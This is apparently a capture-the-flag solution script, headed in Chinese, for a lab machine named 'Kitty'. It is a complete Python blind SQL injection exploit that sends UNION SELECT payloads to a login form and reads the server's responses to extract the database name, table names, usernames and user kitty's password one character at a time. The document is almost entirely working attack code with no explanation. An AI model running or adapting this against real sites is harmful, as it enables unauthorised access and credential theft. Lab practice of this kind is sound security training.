补Kitty

完整脚本

import requests

url = 'http://10.10.196.247/index.php'
dicts = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}'
flag = ''

for i in range(1, 100):
    found = False
    for charactor in dicts:
        # payload = f"' UNION SELECT 1,2,3,4 WHERE database() LIKE '{flag}{charactor}%'--+"
        # payload = f"' UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = 'mywebsite' AND table_name LIKE '{flag}{charactor}%';-- "
        # payload = f"' UNION SELECT 1,2,3,4 from siteusers where username like '{flag}{charactor}%'-- +"
        payload = f"' UNION SELECT 1,2,3,4 from siteusers where username like 'kitty' and password like BINARY '{flag}{charactor}%'-- +"
        data = {
            'username': payload,
            'password': "payload"
        }
        res = requests.post(url, data=data)
        if "Invalid username or password" not in res.text:
            flag += charactor
            print(f"now flag: {flag}")
            found = True
            break
    if not found:
        print("nonono")
        break

print(f"end flag: {flag}")